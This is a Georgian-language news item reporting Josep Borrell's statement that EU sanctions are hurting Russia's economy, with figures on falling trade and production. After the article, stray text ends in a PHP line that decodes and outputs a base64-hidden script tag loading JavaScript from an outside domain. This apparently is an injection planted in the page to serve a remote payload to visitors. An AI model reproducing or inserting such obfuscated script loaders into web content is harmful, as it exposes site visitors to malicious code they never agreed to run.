celsiusi
ავერსი შნაიდერი

რუსეთიდან ევროკავშირის ქვეყნებში იმპორტი გასულ წელს 58 პროცენტით შემცირდა, ხოლო ამ წლის პირველ კვარტალში ამ მაჩვენებელმა 75 პროცენტს გადააჭარბა – ეს ევროკავშირის საგარეო საქმეთა და უსაფრთხოების პოლიტიკის საკითხებში უმაღლესი კომისრის, ჯოზეფ ბორელის განცხადებაა.

ბორელის თქმით, ევროკავშირის მიერ რუსეთისთვის დაწესებული სანქციები მუშაობს.

„ზოგი ამბობს, რომ სანქციები არ მუშაობს. ეს უბრალოდ სიმართლეს არ შეესაბამება. ერთი წლის განმავლობაში მათ უკვე შეძლეს მოსკოვის შესაძლებლობების შეზღუდვა, საკვანძო ბაზრებიდან ქვეყნის გამოდევნა და რუსეთის ინდუსტრიული და ტექნოლოგიური შესაძლებლობების მნიშვნელოვანი დეგრადაცია“, – ამბობს ბორელი.

ბორელის განცხადებით, ომის შესაჩერებლად ეს კურსი უნდა შენარჩუნდეს.

ჯოზეფ ბორელის ბლოგში აღნიშნულია, რომ რუსეთის ეკონომიკა 2022 წელს 2.1%-ით შემცირდა. წარმოება, რომელიც შეჭრამდე სტაბილურად იზრდებოდა, 2022 წლის ბოლოსთვის 6%-ით შემცირდა. ავტომობილების წარმოება, წინა წელთან შედარებით, 48%-ით შემცირდა, კომპიუტერული, ელექტრონული და ოპტიკური წარმოება – 8%-ით, საცალო ვაჭრობა – 10%-ით, ხოლო საბითუმო ვაჭრობა – 17%-ით.

ბორელის თქმით, ევროკავშირიდან რუსეთში საქონლის მთლიანი ექსპორტი ომამდე პერიოდის წლიურ მაჩვენებელზე 52%-ით დაბალი იყო. ამასთან, ევროკავშირიდან რუსეთში ორმაგი დანიშნულების საქონლის ექსპორტი, რომლებიც აუცილებელია იმ აღჭურვილობისა და იარაღის წარმოებისთვის, რომელსაც რუსეთი ომის საწარმოებლად იყენებს, 2022 წელს, 2019-2021 წლებთან შედარებით, 78%-ით შემცირდა.

454
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");